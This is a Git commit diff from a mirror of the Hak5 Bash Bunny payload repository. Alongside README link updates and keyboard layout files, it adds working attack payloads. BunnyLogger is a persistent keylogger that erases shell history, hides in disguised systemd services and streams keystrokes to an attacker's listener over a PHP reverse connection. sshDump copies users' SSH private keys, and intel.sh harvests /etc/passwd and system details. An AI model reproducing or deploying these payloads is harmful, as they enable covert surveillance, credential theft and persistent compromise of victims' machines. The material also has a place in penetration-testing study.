hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/503/head
0iphor13 2022-03-14 12:08:11 +01:00 committed by GitHub
parent 09ab811f9c 2e297ba861
commit bc281bcfdc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
23 changed files with 1170 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -6,14 +6,14 @@ This repository contains payloads and extensions for the Hak5 Bash Bunny. Commun
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
- [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5") - [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny "Documentation") - [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
- [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Forums") - [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
- Discord: [https://hak5.org/discord](https://hak5.org/discord) - Discord: [https://hak5.org/discord](https://hak5.org/discord)
![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg) ![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg)
## Documentation ## Documentation
Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny). Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny).
## Disclaimer ## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.

187
languages/hu.json Normal file
View File

@ -0,0 +1,187 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":" Hungarian QWERTZ language made by Skeleton022",
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"z":"00,00,1c",
"y":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"ö":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"ü":"00,00,2d",
"ó":"00,00,2e",
"ő":"00,00,2f",
"ú":"00,00,30",
"ű":"00,00,31",
"é":"00,00,33",
"á":"00,00,34",
"0":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"í":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Z":"02,00,1c",
"Y":"02,00,1d",
"'":"02,00,1e",
"\"":"02,00,1f",
"+":"02,00,20",
"!":"02,00,21",
"%":"02,00,22",
"/":"02,00,23",
"=":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
"Ö":"02,00,27",
"Ü":"02,00,2d",
"Ó":"02,00,2e",
"Ő":"02,00,2f",
"Ú":"02,00,30",
"Ű":"02,00,31",
"É":"02,00,33",
"Á":"02,00,34",
"?":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
"Í":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00",
"{":"40,00,05",
"&":"40,00,06",
"[":"40,00,09",
"]":"40,00,0a",
"}":"40,00,11",
"\\":"40,00,14",
"@":"40,00,19",
"|":"40,00,1a",
"#":"40,00,1b",
">":"40,00,1d",
"~":"40,00,1e",
"^":"40,00,20",
"`":"40,00,24",
"$":"40,00,33",
";":"40,00,36",
"*":"40,00,38",
"<":"40,00,64"
}

172
languages/jp.json Normal file
View File

@ -0,0 +1,172 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"\"": "02,00,1f",
"3": "00,00,20",
"#": "02,00,20",
"4": "00,00,21",
"$": "02,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"&": "02,00,23",
"7": "00,00,24",
"'": "02,00,24",
"8": "00,00,25",
"(": "02,00,25",
"9": "00,00,26",
")": "02,00,26",
"0": "00,00,27",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2d",
"=": "02,00,2d",
"^": "00,00,2e",
"~": "02,00,2e",
"@": "00,00,2f",
"`": "02,00,2f",
"[": "00,00,30",
"{": "02,00,30",
"\\": "00,00,31",
"|": "02,00,31",
"]": "00,00,32",
"}": "02,00,32",
";": "00,00,33",
"+": "02,00,33",
":": "00,00,34",
"*": "02,00,34",
",": "00,00,36",
"<": "02,00,36",
".": "00,00,37",
">": "02,00,37",
"/": "00,00,38",
"?": "02,00,38",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

173
languages/tr.json Normal file
View File

@ -0,0 +1,173 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,34",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"@": "40,00,14",
"3": "00,00,20",
"#": "40,00,20",
"4": "00,00,21",
"$": "40,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"^": "02,00,20",
"7": "00,00,24",
"&": "02,00,23",
"8": "00,00,25",
"*": "00,00,2d",
"9": "00,00,26",
"(": "02,00,25",
"0": "00,00,27",
")": "02,00,26",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2e",
"_": "02,00,2e",
"=": "02,00,27",
"+": "02,00,21",
"[": "40,00,25",
"{": "40,00,24",
"]": "40,00,26",
"}": "40,00,27",
"\\": "40,00,2d",
"|": "40,00,2e",
";": "02,00,31",
":": "02,00,38",
"'": "02,00,1f",
"\"": "00,00,35",
"`": "40,00,31",
"~": "40,00,30",
",": "00,00,31",
"<": "40,00,35",
".": "00,00,38",
">": "40,00,1e",
"/": "02,00,24",
"?": "02,00,2d",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

62
payloads/library/credentials/BunnyLogger/README.md Normal file
View File

@ -0,0 +1,62 @@
## About:
* Title: BunnyLogger
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Encoding payload and injecting on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends raw keystrokes to attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| xinput | /tools/ |
### Usage:
1. Encode payload.txt and inject into target's system.
2. Start netcat listner on attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
3. Process raw keystrokes using BunnyLoggerDecoder utility:
```
./bunnyLoggerDecoder
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
Usage:
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify Log file.
-m Select Mode(normal|informative)
-o Specify Output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n

50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder Normal file
View File

@ -0,0 +1,50 @@
usage () {
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify Log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify Output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

24
payloads/library/credentials/BunnyLogger/payload.sh Normal file
View File

@ -0,0 +1,24 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/credentials/BunnyLogger/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

BIN
payloads/library/credentials/BunnyLogger/xinput Normal file
View File

Binary file not shown.

49
payloads/library/credentials/sshDump/payload.txt Normal file
View File

@ -0,0 +1,49 @@
# Title: sshDump
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: GNU/Linux.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [Looting]
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
Q ENTER
Q DELAY 2000
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

24
payloads/library/exfiltration/intel/README.md Normal file
View File

@ -0,0 +1,24 @@
# intel(intelligence)
## About:
* Title: intel
* Description: intel(intelligence) payload collects detailed information of victims machine.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltration
* Target: GNU/Linux
* Attackmodes: HID, Storage
## intel(intelligence) payload collects detailed information of victims machine.
### Workflow:
1. Prevent storing history.
2. Fetching BashBunny's block device.
3. Mounting BashBunny.
4. Transfering payload script and executing it.
5. Deleting script from victims system.
6. Unmounting BashBunny.
#### Support me if you like my work:
* https://twitter.com/drapl0n

67
payloads/library/exfiltration/intel/intel.sh Normal file
View File

@ -0,0 +1,67 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Schema:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
nmap -sV localhost >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Interfaces:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
ifconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
ip addr >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
iwconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo Storage Info: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
findmnt >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/fstab >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "USB Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lsusb -v >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "PCI Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lspci -vvv >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "CPU Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lscpu >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Systemd services:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
systemctl list-units >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo User/groups: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
id >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/passwd >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Installed packages:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
snap list >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
flatpak list --app >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel
echo "Directory Structure:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
find * / >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
